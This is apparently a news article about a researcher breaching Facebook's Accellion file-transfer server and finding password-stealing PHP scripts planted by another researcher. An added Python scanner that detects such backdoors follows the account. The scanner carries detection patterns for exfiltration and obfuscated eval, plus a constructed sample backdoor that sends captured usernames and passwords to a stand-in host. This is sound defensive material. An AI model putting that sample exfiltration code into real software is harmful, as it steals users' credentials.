A bug bounty hunter compromises a Facebook staff server through a sloppy file-sharing webapp – and finds someone's already beaten him to it by backdooring the machine.
The pseudonymous penetration tester Orange Tsai, who works for Taiwan-based outfit Devcore, banked $10,000 from Facebook in February for successfully drilling into the vulnerable system.
In a writeup published this week describing how the Linux server was infiltrated, Orange reveals how he stumbled across malware, installed by someone else, that was stealing the usernames and passwords of Facebook employees who logged into the machine. The login credentials were siphoned off to an outside computer.
It's understood no Facebook user information was compromised.
Here's how it went down:
- With some Googling and poking around IP address ranges belonging to Facebook, Orange discovers that files.fb.com exists.
- The website is running Accellion’s web-based Secure File Transfer service.
- This webapp previously suffered a remote-code execution bug, so Orange looks for similar flaws in the software.
- Orange finds, among other bugs, a pre-authentication SQL injection vulnerability that can be exploited to achieve remote code execution. Accellion has since patched four holes – CVE-2016-2350 to CVE-2016-2353 – reported privately by Orange.
- Having exploited the SQL injection bug to plant a webshell and gain control of the box, Orange discovers PHP scripts that intercept Facebook employees' usernames and passwords submitted to the files.fb.com site – credentials that could be used to access other parts of Facebook or be exploited in some way by a creative miscreant.
- The malicious scripts were active at some point in July and in September last year.
- It also turns out the server had a *.fb.com wildcard SSL certificate installed on it. Misusing it would trip Facebook's cert logs, though.
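The credential-stealing scripts described above are exactly the kind of thing a defender wants to find before a bounty hunter does. The scanner below is an added example, not Orange's or Facebook's code, and the page does not show the real scripts: the indicator patterns and the three sample PHP files are assumptions constructed for illustration. It flags a PHP file when it both reads login fields from the request and ships data off the host (outbound HTTP, raw socket, mail, or a drop file), and separately flags self-decoding code such as eval(base64_decode(...)).

```python
"""Heuristic scanner for credential-harvesting PHP backdoors.

Flags a file that both reads login fields from the request and has a path for
data to leave the host, which is the shape of the password-stealing scripts
described above. Pure heuristics: expect false positives on legitimate code
that does both for a good reason, and review every hit by hand.
"""
import os
import re
import tempfile
from dataclasses import dataclass, field

# Indicator patterns are assumptions chosen for this example, not taken from
# the writeup; tune them to the codebase you are auditing.
CREDENTIAL_READS = [
    r"\$_(?:POST|REQUEST|GET)\s*\[\s*['\"](?:pass(?:word|wd)?|pwd|user(?:name)?|login)['\"]\s*\]",
    r"\$_SERVER\s*\[\s*['\"]PHP_AUTH_(?:USER|PW)['\"]\s*\]",
]
# Ways data leaves the host: outbound HTTP, raw sockets, mail, or a drop file
# left on disk for later pickup.
EXFIL_SINKS = [
    r"\bcurl_(?:init|exec)\s*\(",
    r"\bfile_get_contents\s*\(\s*['\"]https?://",
    r"\bfsockopen\s*\(",
    r"\bmail\s*\(",
    r"\bfile_put_contents\s*\(",
]
# Self-decoding code is a strong signal on its own.
OBFUSCATION = [
    r"\beval\s*\(\s*(?:base64_decode|gzinflate|str_rot13)\s*\(",
    r"\bpreg_replace\s*\(\s*['\"][^'\"]*/e['\"]",
]


@dataclass
class Finding:
    reads: list = field(default_factory=list)        # (line number, matched text)
    sinks: list = field(default_factory=list)
    obfuscation: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        # A credential read plus an exfil path, or self-decoding code, is
        # enough to pull the file for manual review.
        return (bool(self.reads) and bool(self.sinks)) or bool(self.obfuscation)


def _grep(lines, patterns):
    hits = []
    for n, line in enumerate(lines, 1):
        for pat in patterns:
            m = re.search(pat, line, re.IGNORECASE)
            if m:
                hits.append((n, m.group(0)))
    return hits


def scan_php_source(src: str) -> Finding:
    lines = src.splitlines()
    return Finding(
        reads=_grep(lines, CREDENTIAL_READS),
        sinks=_grep(lines, EXFIL_SINKS),
        obfuscation=_grep(lines, OBFUSCATION),
    )


def scan_tree(root: str):
    """Return (path, Finding) for every suspicious PHP file under root."""
    results = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".php", ".phtml", ".inc")):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                finding = scan_php_source(fh.read())
            if finding.suspicious:
                results.append((path, finding))
    return results


# Constructed samples for the demo; not the scripts found on files.fb.com.
# 198.51.100.7 is a documentation address, not a real collector.
BACKDOOR_SAMPLE = """<?php
$u = $_POST['username']; $p = $_POST['password'];
$ch = curl_init('http://198.51.100.7/c.php');
curl_setopt($ch, CURLOPT_POSTFIELDS, base64_encode("$u:$p"));
curl_exec($ch);
include 'real_login.php';
"""
BENIGN_LOGIN_SAMPLE = """<?php
$u = $_POST['username']; $p = $_POST['password'];
if (!verify_user($u, $p)) { die('bad login'); }
"""
OBFUSCATED_SAMPLE = """<?php
eval(base64_decode('ZWNobyAnaGknOw=='));
"""

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as root:
        for name, body in [("login.php", BACKDOOR_SAMPLE),
                           ("auth.php", BENIGN_LOGIN_SAMPLE),
                           ("cache.inc", OBFUSCATED_SAMPLE)]:
            with open(os.path.join(root, name), "w") as fh:
                fh.write(body)
        for path, f in scan_tree(root):
            print(path)
            for label, hits in (("read", f.reads), ("sink", f.sinks), ("obfuscation", f.obfuscation)):
                for n, text in hits:
                    print(f"  {label}: line {n}: {text}")
```

Run it against the web root of any third-party PHP app you host; auth.php is correctly left alone because it reads credentials but has no way to send them anywhere, while login.php and cache.inc are reported with the line numbers that tripped the rules. Pair the output with file modification times and a known-good hash list of the vendor's install, since an attacker who can plant a webshell can also edit an existing login page rather than add a new file.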
According to Facebook security engineer Reginaldo Silva, the password-slurping malware was installed by another security researcher who had earlier poked around within Facebook's system in an attempt to snag a bug bounty.
"We're really glad Orange reported this to us. In this case, the software we were using is third party. As we don't have full control of it, we ran it isolated from the systems that host the data people share on Facebook. We do this precisely to have better security," said Silva.
"We determined that the activity Orange detected was in fact from another researcher who participates in our bounty program. Neither of them were able to compromise other parts of our infrastructure, so the way we see it, it's a double win: two competent researchers assessed the system, one of them reported what he found to us and got a good bounty, none of them were able to escalate access." ®